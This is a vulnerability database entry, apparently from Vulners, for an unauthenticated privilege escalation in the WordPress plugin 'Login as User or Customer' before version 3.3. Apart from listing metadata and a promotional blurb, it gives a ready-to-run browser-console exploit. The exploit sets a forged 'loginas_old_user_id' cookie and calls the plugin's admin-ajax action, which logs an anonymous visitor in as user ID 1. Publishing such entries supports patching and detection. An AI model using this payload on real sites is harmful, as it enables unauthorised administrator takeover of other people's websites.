Lucene search

K

Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin

🗓️ 27 Dec 2022 00:00:00Reported by DavidType 
wpexploit
 wpexploit
👁 314 Views

Unauthenticated Privilege Escalation to Admin via Login Vulnerabilit

Show more
Related
Code
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user, then reload the page to be logged in as the user with ID:

document.cookie = "loginas_old_user_id=1";
fetch("/wp-admin/admin-ajax.php?action=loginas_return_admin", {
  "method": "GET",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Dec 2022 00:00Current
1.8Low risk
Vulners AI Score1.8
EPSS0.172
314
.json
Report